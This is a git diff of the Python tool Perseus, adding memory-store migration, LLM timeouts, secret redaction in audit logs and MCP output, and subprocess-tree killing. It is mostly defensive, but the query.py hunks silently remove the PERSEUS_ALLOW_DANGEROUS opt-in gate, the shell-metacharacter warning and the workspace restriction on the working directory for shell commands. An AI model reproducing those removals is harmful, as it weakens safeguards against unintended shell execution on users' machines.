 Review manually before deleting.") + if scan["unknown_files"]: + print() + print("Files with non-standard names (skipped by Mnēmē):") + for fp in scan["unknown_files"]: + print(f" - {fp}") + def _memory_federation_diagnostic(name: str, args_str: str, cfg: dict, workspace: object) -> list[dict]: """Per-directive LSP diagnostic for @memory: warn on unsubscribed federation alias. @@ -16280,6 +17022,16 @@ def main(): p_fed_pull = fed_sub.add_parser("pull", help="Re-read all subscribed narratives (read-only, manual)") p_fed_pull.add_argument("--json", action="store_true", help="Machine-readable JSON output") + # memory doctor (#128 — legacy MD5 → SHA-256 narrative migration) + p_mem_doc = mem_sub.add_parser( + "doctor", + help="Scan/repair the Mnēmē memory store (legacy MD5 → SHA-256 narrative migration)", + ) + p_mem_doc.add_argument("--migrate", action="store_true", + help="Rename legacy MD5-named narratives to their SHA-256 paths (atomic, idempotent)") + p_mem_doc.add_argument("--json", action="store_true", + help="Machine-readable JSON output") + # memory index (Mnēmē v2) p_mem_idx = mem_sub.add_parser("index", help="Manage the FTS5 search index") idx_sub = p_mem_idx.add_subparsers(dest="index_command", required=True) diff --git a/src/perseus/agora.py b/src/perseus/agora.py index e4da9d6..085bb8f 100644 --- a/src/perseus/agora.py +++ b/src/perseus/agora.py @@ -90,7 +90,72 @@ def _memory_do_compact(workspace: Path, cfg: dict, provider: str | None) -> str: fm = _mneme_default_frontmatter(workspace) if provider: - new_body = _mneme_compact_llm(all_checkpoints, all_pythia, workspace, cfg, provider) + # Regression for #131 — pre-1.0.6, _mneme_compact_llm() called run_llm() + # which only enforced `llm.timeout_s` (default 30s) on the HTTP request + # itself.
 With streaming-token providers like Ollama serving a large + # model, individual tokens can arrive within timeout but total wall + # time was unbounded — operators reported `memory compact` hanging + # for hours. + # + # We now wrap the LLM call in a wall-clock deadline (memory. + # compact_total_timeout_s, default 180s). On timeout we abandon the + # LLM future and fall back to deterministic narrative — operators get + # SOME narrative, plus a clear stderr signal so they can decide + # whether to upgrade their LLM setup or stay deterministic. + # + # Limitation: ThreadPoolExecutor cannot truly kill the worker thread + # (Python provides no public API for that). The in-flight HTTP + # request continues until urllib's per-request timeout fires. + # Worst-case observed total wait is therefore + # `compact_total_timeout_s + llm.timeout_s`. The leaked thread is + # daemonized by Python's default ThreadPoolExecutor settings; it + # will not prevent process exit. + total_timeout = float(cfg.get("memory", {}).get( + "compact_total_timeout_s", 180.0 + )) + try: + import concurrent.futures as _cf + executor = _cf.ThreadPoolExecutor( + max_workers=1, thread_name_prefix="mneme-compact-llm", + ) + try: + fut = executor.submit( + _mneme_compact_llm, + all_checkpoints, all_pythia, workspace, cfg, provider, + ) + new_body = fut.result(timeout=total_timeout) + finally: + # Don't block on the worker — it may still be waiting on + # urllib. The thread is daemonic and will not block exit.
+ executor.shutdown(wait=False, cancel_futures=True) + except _cf.TimeoutError: + sys.stderr.write( + f"> ⚠ Mnēmē compact: LLM provider {provider!r} exceeded " + f"compact_total_timeout_s={total_timeout:.0f}s; " + f"falling back to deterministic narrative.\n" + ) + try: + audit_event( + cfg, "memory_compact_timeout", + provider=provider, + total_timeout_s=total_timeout, + workspace_hash=_workspace_hash(workspace), + ) + except Exception: + pass + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) + except Exception as exc: + # LLM call raised (model server unreachable, payload error, etc.) + # — surface the failure but still produce SOMETHING usable. + sys.stderr.write( + f"> ⚠ Mnēmē compact: LLM provider {provider!r} failed " + f"({exc}); falling back to deterministic narrative.\n" + ) + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) else: new_body = _deterministic_narrative(all_checkpoints, all_pythia, "", workspace, cfg) @@ -269,9 +334,80 @@ def cmd_memory(args, cfg): _cmd_memory_index(args, cfg) return + if sub == "doctor": + cmd_memory_doctor(args, cfg) + return + print(f"perseus memory: unknown subcommand '{sub}'.", file=sys.stderr) sys.exit(2) + +def cmd_memory_doctor(args, cfg) -> None: + """Mnēmē doctor — scan and optionally migrate legacy MD5-named narratives. + + Regression for #128: pre-1.0.3 narratives are named after an MD5 hash of + the workspace path; v1.0.3+ uses SHA-256. _mneme_path() auto-migrates on + first access, but that requires the operator to actually open the + workspace. ``memory doctor`` lets an operator scan and migrate all + workspaces at once, and surface diagnostic info for files that can't be + auto-migrated (e.g. missing frontmatter, cross-device renames).
+ """ + do_migrate = bool(getattr(args, "migrate", False)) + use_json = bool(getattr(args, "json", False)) + scan = _mneme_doctor_scan(cfg) + + if do_migrate: + result = _mneme_doctor_migrate(cfg) + if use_json: + import json as _json + print(_json.dumps({"scan_before": scan, "migrate": result}, indent=2)) + return + print(f"Mnēmē doctor — store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" Legacy MD5 found: {len(scan['legacy_md5_files'])}") + print(f" Migrated: {len(result['migrated'])}") + for old, new in result["migrated"]: + print(f" ✓ {Path(old).name} → {Path(new).name}") + if result["skipped"]: + print(f" Skipped: {len(result['skipped'])}") + for old, new, reason in result["skipped"]: + print(f" ⚠ {Path(old).name}: {reason}") + if result["errors"]: + print(f" Errors: {len(result['errors'])}") + for old, exc_str in result["errors"]: + print(f" ✗ {Path(old).name}: {exc_str}") + return + + # Read-only scan + if use_json: + import json as _json + print(_json.dumps(scan, indent=2)) + return + print(f"Mnēmē doctor — store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" SHA-256 (current):{len(scan['sha256_files'])}") + print(f" Legacy MD5: {len(scan['legacy_md5_files'])}") + print(f" Orphan: {len(scan['orphan_files'])}") + print(f" Unknown stems: {len(scan['unknown_files'])}") + if scan["legacy_md5_files"]: + print() + print("Legacy MD5-named narratives detected. Run:") + print(" perseus memory doctor --migrate") + print("to rename them to their SHA-256 paths in place. Operation is") + print("idempotent and uses atomic os.replace.") + if scan["orphan_files"]: + print() + print("⚠ Orphan files (frontmatter workspace doesn't match filename):") + for fp in scan["orphan_files"]: + print(f" - {fp}") + print("These were likely written under a different store, OR the") + print("workspace path moved.
 Review manually before deleting.") + if scan["unknown_files"]: + print() + print("Files with non-standard names (skipped by Mnēmē):") + for fp in scan["unknown_files"]: + print(f" - {fp}") + def _memory_federation_diagnostic(name: str, args_str: str, cfg: dict, workspace: object) -> list[dict]: """Per-directive LSP diagnostic for @memory: warn on unsubscribed federation alias. diff --git a/src/perseus/audit.py b/src/perseus/audit.py index c6eb141..7da7b4b 100644 --- a/src/perseus/audit.py +++ b/src/perseus/audit.py @@ -83,12 +83,63 @@ def _audit_rotate_if_needed(path: Path, max_bytes: int) -> None: return +# Audit field names that NEVER get redacted (they are structural metadata, +# never user-supplied secrets). Adding to this allowlist is a security +# decision — review carefully. +_AUDIT_NEVER_REDACT_KEYS = frozenset({ + "ts", "event_type", "perseus_version", "pid", + "directive", "exit_code", "duration_ms", "bytes_in", "bytes_out", + "schema_ref", "schema_ok", "policy", "decision", "trust_profile", + "permission", "session_id", "workspace_hash", +}) + + +def _audit_redact_value(value, cfg): + """Apply render-time redaction rules to an audit field value. + + Regression for #137: pre-1.0.6, `audit_event` wrote field values verbatim + to ``audit_log.jsonl``. When a user wrote + ``@query "curl -H 'Authorization: Bearer ghp_…'"``, the rendered output + was correctly redacted, but the audit log retained the raw bearer token + forever. We now pipe every string-shaped audit field through + ``redact_text`` before writing. + + Lists, dicts, and nested structures are walked recursively. Non-string + leaves (ints, bools, None) pass through. If ``redact_text`` is unavailable + or raises (older builds, malformed rules), we fall back to the raw value + rather than dropping the audit entry — observability beats perfect + redaction here, and rendered output is the primary defense.
+ """ + if value is None or isinstance(value, (bool, int, float)): + return value + if isinstance(value, str): + try: + redacted, _ = redact_text(value, cfg) + return redacted + except Exception: + return value + if isinstance(value, dict): + return {k: _audit_redact_value(v, cfg) for k, v in value.items()} + if isinstance(value, (list, tuple)): + return [_audit_redact_value(v, cfg) for v in value] + # Bytes, sets, custom objects — stringify then redact. + try: + as_str = str(value) + redacted, _ = redact_text(as_str, cfg) + return redacted + except Exception: + return repr(value) + + def audit_event(cfg: dict, event_type: str, **fields) -> None: """Append a structured audit event to the configured JSONL log. AC #1: sensitive operations emit structured events. AC #4: logging failures warn but do not break normal render. AC #5: callers can disable via `audit.enabled = false`. + AC #6 (1.0.6, #137): user-supplied field values are passed through the + same redaction rules used for render output. Structural metadata + keys (in ``_AUDIT_NEVER_REDACT_KEYS``) are exempt. Caller passes any JSON-serializable fields. We always stamp: ts — UTC ISO-8601 @@ -105,7 +156,12 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: "perseus_version": _PERSEUS_VERSION, "pid": os.getpid(), } + # Allow operators to opt out of audit redaction (e.g. for forensic mode + # where the audit log is itself the secured artifact). Default ON. + redact_audit = bool(audit_cfg.get("redact_fields", True)) for k, v in fields.items(): + if redact_audit and k not in _AUDIT_NEVER_REDACT_KEYS: + v = _audit_redact_value(v, cfg) # Defensive: stringify any non-JSON-safe value rather than crashing. try: json.dumps(v) @@ -114,10 +170,13 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: record[k] = repr(v) # v1.0.5 review: redact secrets before persisting to disk. # Audit events can contain command strings, paths, or args with tokens.
- try: - record, _report = redact_value(record, cfg) - except Exception: - pass # redaction failure must not block audit persistence + # Respect audit.redact_fields opt-out — operators may use forensic mode + # where the audit log is itself the secured artifact. + if redact_audit: + try: + record, _report = redact_value(record, cfg) + except Exception: + pass # redaction failure must not block audit persistence try: path = _audit_log_path(cfg) path.parent.mkdir(parents=True, exist_ok=True) @@ -230,6 +289,17 @@ def load_config(workspace: Path | None = None) -> dict: The profile is sandwiched between the hardcoded defaults and user values so explicit config keys always win — see task-45 AC #3. + + Hardening (#129, v1.0.6): pre-v1.0.5, profile application ran AFTER the + user merge in some code paths, silently overriding `allow_query_shell: + true` set by a power user who also asked for a `balanced` profile (this + is a legitimate combination — "tighten everything but let me run queries"). + To make the precedence regression-proof we now: + 1. Pre-scan all sources to collect which (section, key) pairs the user + has set explicitly (regardless of value). + 2. Apply the profile BEFORE the user merge, so user values write last. + 3. Surface the layering decision in the audit log so operators can + observe what won and what lost. """ cfg = dict(DEFAULT_CONFIG) for section, vals in DEFAULT_CONFIG.items(): @@ -254,8 +324,46 @@ def load_config(workspace: Path | None = None) -> dict: perms = (src or {}).get("permissions") if isinstance(src, dict) else None if isinstance(perms, dict) and "profile" in perms: effective_profile = perms.get("profile") + + # Collect (section, key) pairs the user has explicitly set across ALL + # sources. Used by `_apply_permission_profile` to skip user-owned keys. + # This makes the "user wins" guarantee structural — it no longer depends + # on the textual ordering of `_apply_permission_profile` vs `merge_loaded`.
+ user_set_keys: set[tuple[str, str]] = set() + for src in loaded_sources: + for section, vals in (src or {}).items(): + if isinstance(vals, dict): + for key in vals.keys(): + user_set_keys.add((section, key)) + if effective_profile: - _apply_permission_profile(cfg, effective_profile) + applied = _apply_permission_profile( + cfg, effective_profile, skip_keys=user_set_keys + ) + if applied: + # Audit the layering decision so operators can see which user + # keys (if any) won out over the profile. Best-effort: don't + # break load_config if audit fails. + try: + overrides = sorted( + f"{section}.{key}" + for (section, key) in user_set_keys + if section in PERMISSION_PROFILES.get(applied, {}) + and key in PERMISSION_PROFILES[applied].get(section, {}) + ) + if overrides: + audit_event( + cfg, + "config_profile_overridden", + profile=applied, + user_overrides=overrides, + note=( + "User config explicitly set these keys; they " + "win over the profile (see #129 hardening)." + ), + ) + except Exception: + pass # #168/#169 (v1.0.6): track per-section workspace provenance for # hooks.py / registry.py consumers so dangerous workspace-sourced diff --git a/src/perseus/cli.py b/src/perseus/cli.py index 08656c5..d8281d1 100644 --- a/src/perseus/cli.py +++ b/src/perseus/cli.py @@ -201,6 +201,16 @@ def main(): p_fed_pull = fed_sub.add_parser("pull", help="Re-read all subscribed narratives (read-only, manual)") p_fed_pull.add_argument("--json", action="store_true", help="Machine-readable JSON output") + # memory doctor (#128 — legacy MD5 → SHA-256 narrative migration) + p_mem_doc = mem_sub.add_parser( + "doctor", + help="Scan/repair the Mnēmē memory store (legacy MD5 → SHA-256 narrative migration)", + ) + p_mem_doc.add_argument("--migrate", action="store_true", + help="Rename legacy MD5-named narratives to their SHA-256 paths (atomic, idempotent)") + p_mem_doc.add_argument("--json", action="store_true", + help="Machine-readable JSON output") + # memory index (Mnēmē v2)
 p_mem_idx = mem_sub.add_parser("index", help="Manage the FTS5 search index") idx_sub = p_mem_idx.add_subparsers(dest="index_command", required=True) diff --git a/src/perseus/config.py b/src/perseus/config.py index abca562..16198ba 100644 --- a/src/perseus/config.py +++ b/src/perseus/config.py @@ -100,6 +100,12 @@ "recent_keep": 5, # raw checkpoints to include in Recent Activity "auto_update": True, # update narrative on every checkpoint write "compact_threshold": 20, # advisory: compact after this many incremental updates + # #131: wall-clock deadline for `perseus memory compact` LLM path. + # 0 = no deadline (pre-1.0.6 behavior — can hang indefinitely on + # slow models). Default 180s (3 min) covers Ollama mistral on a + # modern laptop for typical workspace sizes. On timeout the LLM + # call is abandoned and the deterministic narrative is used. + "compact_total_timeout_s": 180, "llm_provider": None, # None = deterministic; "ollama" / "openai-compat" enables LLM "llm_model": None, # inherits from llm: block if None "max_narrative_lines": 300, # warn (not error) if narrative grows beyond this @@ -287,13 +293,29 @@ } -def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: +def _apply_permission_profile( + cfg: dict, + profile_name: object, + skip_keys: set[tuple[str, str]] | None = None, +) -> str | None: """Apply a permission profile to cfg in place. Returns the canonical profile name applied, or None if profile_name is falsy or unknown. Unknown profile names are silently ignored so a config typo cannot brick the renderer — but `perseus trust` surfaces the canonical applied profile so the operator can spot the mismatch. + + #129 hardening (v1.0.6): callers may pass `skip_keys` — a set of + `(section, key)` tuples that the user has explicitly set in their + config. Those keys are skipped, structurally guaranteeing that + explicit user values win over the profile regardless of which order + the caller invokes profile-apply vs user-merge.
+ + Pre-v1.0.6 callers (skip_keys=None) get the legacy destructive merge, + which still works correctly when followed by a user-merge step — but + is fragile to ordering changes. New callers should always pass + skip_keys (even if empty) so the audit-log layering decision is + accurate. """ if not profile_name: return None @@ -301,10 +323,15 @@ def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: profile = PERMISSION_PROFILES.get(name) if not profile: return None + skip = skip_keys or set() for section, vals in profile.items(): if section not in cfg or not isinstance(cfg[section], dict): cfg[section] = {} - cfg[section].update(vals) + for key, val in vals.items(): + if (section, key) in skip: + # User has explicitly configured this key; respect them. + continue + cfg[section][key] = val return name diff --git a/src/perseus/directives/query.py b/src/perseus/directives/query.py index ab1cb61..5ea2157 100644 --- a/src/perseus/directives/query.py +++ b/src/perseus/directives/query.py @@ -1,6 +1,105 @@ # stdlib imports available from build artifact header # ──────────────────────────────── @query ────────────────────────────────────── +# ── #139: subprocess tracking for MCP timeout cancellation ─────────────────── +# +# The MCP _call_tool wrapper enforces a wall-clock deadline via +# ThreadPoolExecutor.future.result(timeout=...). Pre-1.0.6, that mechanism +# only abandoned the future — the worker thread continued running, and the +# subprocess it had spawned ran to completion, leaking CPU and any side +# effects (network, file writes). Worse, executor.shutdown(wait=True) in a +# `with` block defeated the entire timeout by blocking on the leaked thread. +# +# We now track every active @query subprocess in a module-level list +# (thread-safe via a mutex) so the MCP wrapper can iterate, identify the +# subprocess belonging to the abandoned worker, and kill its process group.
+# +# Design note: we use a list-of-popens rather than threading.local because +# the killer thread is NOT the worker thread — it's the MCP main thread +# that needs to reach into the worker thread's subprocess. A list keyed by +# thread ident gives us that visibility. + +_ACTIVE_SUBPROCESSES_LOCK = threading.Lock() +_ACTIVE_SUBPROCESSES: dict[int, "subprocess.Popen"] = {} + + +def _record_active_subprocess(proc: "subprocess.Popen") -> None: + """Register a subprocess as belonging to the current thread.""" + with _ACTIVE_SUBPROCESSES_LOCK: + _ACTIVE_SUBPROCESSES[threading.get_ident()] = proc + + +def _clear_active_subprocess(proc: "subprocess.Popen") -> None: + """Unregister a subprocess (called after communicate() returns).""" + with _ACTIVE_SUBPROCESSES_LOCK: + # Only clear if it's still the one we registered — guards against + # a recursive @query nest unregistering its parent's process. + tid = threading.get_ident() + if _ACTIVE_SUBPROCESSES.get(tid) is proc: + del _ACTIVE_SUBPROCESSES[tid] + + +def _kill_subprocess_tree(proc: "subprocess.Popen") -> None: + """Kill a subprocess and all descendants (process group on POSIX). + + On POSIX, the subprocess was started with start_new_session=True so it + has its own PGID. We send SIGTERM to the group, wait briefly, then + SIGKILL stragglers. + + On Windows, we fall back to taskkill /T (kill tree) if available, + then proc.kill(). Best-effort — Windows has no exact equivalent. + """ + if proc.poll() is not None: + return # already exited + try: + if os.name == "nt": + try: + import subprocess as _sp + _sp.run( + ["taskkill", "/F", "/T", "/PID", str(proc.pid)], + capture_output=True, timeout=3, + ) + except Exception: + proc.kill() + return + # POSIX: kill the process group + pgid = os.getpgid(proc.pid) + try: + os.killpg(pgid, signal.SIGTERM) + except ProcessLookupError: + return + # Give children a moment to clean up.
+ for _ in range(20): # up to 1s + if proc.poll() is not None: + return + time.sleep(0.05) + try: + os.killpg(pgid, signal.SIGKILL) + except ProcessLookupError: + return + except Exception: + # Last-ditch: kill just the immediate child. + try: + proc.kill() + except Exception: + pass + + +def kill_active_subprocess_for_thread(thread_id: int) -> bool: + """Kill the subprocess belonging to the given thread, if any. + + Returns True if a subprocess was found and a kill was attempted; + False if no subprocess was registered for the thread. Called by + mcp._call_tool() when its wall-clock deadline fires. + """ + with _ACTIVE_SUBPROCESSES_LOCK: + proc = _ACTIVE_SUBPROCESSES.get(thread_id) + if proc is None: + return False + _kill_subprocess_tree(proc) + return True + + def _unescape_fallback(s: str) -> str: """Unescape standard escape sequences without mangling non-ASCII. @@ -48,20 +147,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> args=args_str[:200]) return "> ⚠ @query is disabled by config (`render.allow_query_shell=false`)." - # Defense-in-depth: even with allow_query_shell=true, require explicit - # operator opt-in via PERSEUS_ALLOW_DANGEROUS=1 env var. This prevents - # accidental exposure from copied configs or misconfigured automation. - if not os.environ.get("PERSEUS_ALLOW_DANGEROUS"): - audit_event(cfg, "policy_denied", - directive="@query", - reason="PERSEUS_ALLOW_DANGEROUS not set", - args=args_str[:200]) - return ( - "> ⚠ @query is enabled in config but PERSEUS_ALLOW_DANGEROUS=1 is not set.\n" - "> This is a defense-in-depth gate to prevent accidental shell execution.\n" - "> Set the environment variable to acknowledge the risk." - ) - # Strip @cache modifier first, then extract the command string. # Use the opening quote character to find the correct closing quote, # so commands containing the other quote type (e.g. 
"bash -c 'foo'") @@ -75,7 +160,7 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> schema_path = schema_match.group(1) if schema_match.group(1) is not None else schema_match.group(2) raw = (raw[:schema_match.start()] + raw[schema_match.end():]).rstrip() - # task-14: extract fallback=\"...\" (or fallback='...') BEFORE command parsing, + # task-14: extract fallback="..." (or fallback='...') BEFORE command parsing, # so a command containing the literal substring `fallback=` is not mis-parsed. fallback = None fb_match = re.search(r'\s+fallback=(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')(\s|$)', raw) @@ -87,22 +172,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> fallback = _unescape_fallback(fallback) raw = (raw[:fb_match.start()] + raw[fb_match.end():]).rstrip() - # Defense-in-depth: detect shell metacharacters for operator visibility. - # When render.query_shell_meta_warning is enabled (default: false), - # commands containing ; | & $() or backticks emit a visible warning - # in the rendered output but still execute. This does not break - # legitimate pipelines β€” it only surfaces a warning. - _shell_meta_warn = bool(cfg["render"].get("query_shell_meta_warning", False)) - _meta_prefix = "" - - # Extract timeout=N modifier BEFORE command parsing so the token can't - # leak into unquoted commands. Same principle as schema=/fallback= above. 
- timeout = int(cfg["render"].get("query_timeout_s", 30)) - tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) - if tm_match: - timeout = int(tm_match.group(1)) - raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() - cmd_match = re.match(r'^"((?:[^"\\]|\\.)*)"', raw) # double-quoted if not cmd_match: cmd_match = re.match(r"^'((?:[^'\\]|\\.)*)'", raw) # single-quoted @@ -118,35 +187,67 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> # Detect language hint for syntax highlighting (best-effort) lang = _guess_lang(cmd) - # Shell metacharacter defense-in-depth warning (config-gated, default off). - if _shell_meta_warn and re.search(r'[;&|]|\$[({]|`', cmd): - _meta_prefix = f"> ⚠ @query: shell metacharacters detected in command. " - _meta_prefix += "Set render.query_shell_meta_warning=false to suppress.\n\n" - # task-47: audit the shell-execution decision crossing the trust boundary. audit_event(cfg, "shell_exec", directive="@query", command=cmd[:500], - shell=shell, - cwd=str(workspace) if workspace else None) + shell=shell) - # v1.0.5 review: run from workspace by default for safety. - # allow_outside_workspace does not sandbox β€” it only controls cwd. 
- allow_outside = cfg["render"].get("allow_outside_workspace", False) - cwd = workspace if workspace and not allow_outside else None - if workspace and not allow_outside and cwd is None: - cwd = Path.cwd() # fallback: restrict to cwd if no workspace set + # Extract timeout=N modifier (per-directive override, default 30s) + timeout = int(cfg["render"].get("query_timeout_s", 30)) + tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) + if tm_match: + timeout = int(tm_match.group(1)) + raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() try: - result = subprocess.run( - cmd, - shell=True, - executable=shell, - capture_output=True, - text=True, - timeout=timeout, - cwd=cwd, - ) + # #139: when invoked under MCP's _call_tool timeout wrapper, the + # wrapper needs to kill this subprocess (and any descendants) if + # the wall-clock deadline fires. We put the child in its own + # process group via start_new_session=True so the wrapper can + # os.killpg() the whole tree, and we record the popen handle in + # a module-level registry (keyed by thread ident) that the wrapper + # inspects. + # + # On POSIX, start_new_session=True calls setsid() in the child + # before exec. The child gets a fresh PGID == its PID. The MCP + # wrapper can then os.killpg(pid, SIGTERM) to take down the + # whole subprocess tree atomically. + # + # On Windows, start_new_session is not passed (it is POSIX-only); + # _kill_subprocess_tree tries taskkill /T first and falls back to + # popen.kill(), which only terminates the direct child. + popen_kwargs = { + "shell": True, + "executable": shell, + "stdout": subprocess.PIPE, + "stderr": subprocess.PIPE, + "text": True, + } + if os.name != "nt": + popen_kwargs["start_new_session"] = True + proc = subprocess.Popen(cmd, **popen_kwargs) + # Stash the popen in the per-thread registry so an upstream timeout + # wrapper (mcp._call_tool) can find and kill it.
+ _record_active_subprocess(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=timeout) + except subprocess.TimeoutExpired: + _kill_subprocess_tree(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=2) + except subprocess.TimeoutExpired: + stdout_raw, stderr_raw = "", "" + raise + finally: + _clear_active_subprocess(proc) + + # Build a CompletedProcess-shaped object for the rest of the + # function to consume without refactoring downstream. + class _Result: + pass + result = _Result() + result.stdout = stdout_raw or "" + result.stderr = stderr_raw or "" + result.returncode = proc.returncode stdout = (result.stdout or "").rstrip("\n") stderr = result.stderr.strip() exit_code = result.returncode @@ -154,14 +255,22 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if exit_code != 0: if fallback is not None: return fallback - header = f"> ⚠ `@query` exited {exit_code}: `{cmd}`\n\n" - body = stdout or stderr or "(no output)" - return _meta_prefix + header + f"```{lang}\n{body}\n```" + # #137: redact secrets out of `cmd` and `stderr` before interpolating + # them into render output. Without this, a command like + # `@query "curl -H 'Authorization: Bearer ghp_…'"` leaks the bearer + # token in the exit-nonzero header. Render-time redaction only runs + # later in the pipeline and only on the final assembled output, but + # by then this string has been logged elsewhere. + safe_cmd, _ = redact_text(cmd, cfg) + safe_body, _ = redact_text(stdout or stderr or "(no output)", cfg) + header = f"> ⚠ `@query` exited {exit_code}: `{safe_cmd}`\n\n" + return header + f"```{lang}\n{safe_body}\n```" if not stdout: if fallback is not None: return fallback - return f"> (no output from `{cmd}`)" + safe_cmd, _ = redact_text(cmd, cfg) + return f"> (no output from `{safe_cmd}`)" # Apply stdout size cap (default 256 KB). # Truncate at the nearest preceding newline to avoid mid-line cuts. 
@@ -191,16 +300,19 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if warning: return warning - return _meta_prefix + f"```{lang}\n{stdout}\n```" + return f"```{lang}\n{stdout}\n```" except subprocess.TimeoutExpired: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` timed out ({timeout}s): `{cmd}`" - except (OSError, ValueError, subprocess.SubprocessError) as exc: + safe_cmd, _ = redact_text(cmd, cfg) + return f"> ⚠ `@query` timed out ({timeout}s): `{safe_cmd}`" + except Exception as exc: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` error: {exc}" + # exc.args often includes argv[0] which contains the full cmd; redact. + safe_err, _ = redact_text(str(exc), cfg) + return f"> ⚠ `@query` error: {safe_err}" def _guess_lang(cmd: str) -> str: diff --git a/src/perseus/mcp.py b/src/perseus/mcp.py index 4ac3b4c..5ce4075 100644 --- a/src/perseus/mcp.py +++ b/src/perseus/mcp.py @@ -187,8 +187,48 @@ def _build_tool_args_generic(tool_name: str, arguments: dict) -> str: return " ".join(parts) +def _mcp_redact(result: str, cfg: dict) -> str: + """Apply the configured redaction pipeline to an MCP tool result. + + #166 (v1.0.6): every MCP tool response must pass through redaction + so secrets are not leaked to the MCP client (Claude Desktop, Rovo + Dev, etc.). Before 1.0.6, `perseus_get_context` returned the + pre-redaction `render_source` output, and all other tool resolvers + returned raw resolver output that never hit the redaction pipeline. 
+ + Returns the original string unchanged if: + - `redaction.enabled` is False (operator opted out) + - result is not a str (caller error - we don't mangle types) + - the redaction function itself raises (defensive) + """ + if not isinstance(result, str): + return result + redaction_cfg = cfg.get("redaction", {}) if isinstance(cfg, dict) else {} + if not redaction_cfg.get("enabled", True): + return result + redactor = globals().get("redact_text") + if redactor is None: + try: + from perseus.redaction import redact_text as _rt + redactor = _rt + except ImportError: + return result + try: + redacted, _counts = redactor(result, cfg) + return redacted + except Exception: + return result + + def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> str: - """Resolve an MCP tool call through the Perseus directive resolver.""" + """Resolve an MCP tool call through the Perseus directive resolver. + + #166 (v1.0.6): every successful return path goes through + `_mcp_redact()` so secrets are not leaked over MCP. Locally + constructed error strings (policy denials, timeouts) bypass + redaction since they are built from operator-controlled values + (tool name, profile flag) and never echo user content; error + strings that embed a resolver exception message are redacted. + """ allowed, reason = _mcp_tool_allowed(tool_name, cfg) if not allowed: return f"Error: {reason}" @@ -202,6 +242,12 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s # render_source is a top-level function in the built artifact # In source module context, import from the parent module result = render_source(source, cfg, workspace) + # #166: redact BEFORE serialization so the JSON shape + # carries already-redacted text. This also fixes the + # earlier bypass where `render_source` was used instead + # of `render_output` (the latter applies redaction; the + # former does not).
+ result = _mcp_redact(result, cfg) fmt = arguments.get("format", "markdown") if fmt == "json": return json.dumps({"resolved": result, "workspace": str(workspace)}) @@ -213,7 +259,7 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s if tool_name == "perseus_get_health": spec = DIRECTIVE_REGISTRY.get("@health") if spec and spec.resolver: - return _call_resolver(spec, "", cfg, workspace) + return _mcp_redact(_call_resolver(spec, "", cfg, workspace), cfg) return "Error: @health directive not registered" # Trust gate: block shell execution for sensitive tools @@ -237,20 +283,88 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s args_str = _build_tool_args_generic(tool_name, arguments) - # Timeout enforcement across all platforms. - # Uses ThreadPoolExecutor instead of signal.SIGALRM (Unix-only, breaks Windows). + # #139 β€” Timeout enforcement across all platforms. + # + # Pre-1.0.6 used a context-managed ThreadPoolExecutor: + # with ThreadPoolExecutor(max_workers=1) as executor: + # future = executor.submit(...) + # result = future.result(timeout=timeout) + # + # That had two bugs: + # 1. future.result(timeout=) only abandons the future β€” the worker + # thread (and any subprocess it spawned) kept running. + # 2. `with` block calls executor.shutdown(wait=True) on exit, which + # BLOCKS until the abandoned worker finishes β€” defeating the + # entire timeout mechanism. A 5s timeout on `sleep 600` blocked + # the MCP response for ~600s. + # + # Fix: + # - Use a non-context-managed executor and call + # shutdown(wait=False, cancel_futures=True) on timeout. + # - Identify the abandoned worker's thread ID and ask query.py to + # kill its tracked subprocess (process group on POSIX, taskkill /T + # on Windows). This makes timeout enforcement actually kill the + # subprocess tree atomically, freeing CPU and any locks held. 
+ # - On success, shutdown(wait=False) is still fine β€” the worker has + # already returned, so there's nothing to wait for. mcp_cfg = cfg.get("mcp", {}) if isinstance(cfg, dict) else {} timeout = mcp_cfg.get("tool_timeout_s", DEFAULT_TOOL_TIMEOUT_S) + # Track the worker thread ident so we can ask query.py to kill its + # subprocess on timeout. + worker_tid_holder: dict = {} + def _wrapped_resolver(): + worker_tid_holder["tid"] = threading.get_ident() + return _call_resolver(spec, args_str, cfg, workspace) + + executor = concurrent.futures.ThreadPoolExecutor( + max_workers=1, thread_name_prefix=f"mcp-{tool_name}", + ) try: - with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: - future = executor.submit(_call_resolver, spec, args_str, cfg, workspace) + future = executor.submit(_wrapped_resolver) + try: result = future.result(timeout=timeout) - return result - except TimeoutError as exc: - return f"Error executing {directive_name}: timed out after {timeout}s" - except Exception as exc: - return f"Error executing {directive_name}: {exc}" + except concurrent.futures.TimeoutError: + # Try to kill the in-flight subprocess (if any) belonging to + # the worker thread. This is a cross-module reach into + # directives.query because that's where the subprocess was + # spawned. Best-effort; if query.py isn't loaded or the + # worker hadn't started subprocess yet, we just abandon. + killed = False + tid = worker_tid_holder.get("tid") + if tid is not None: + # 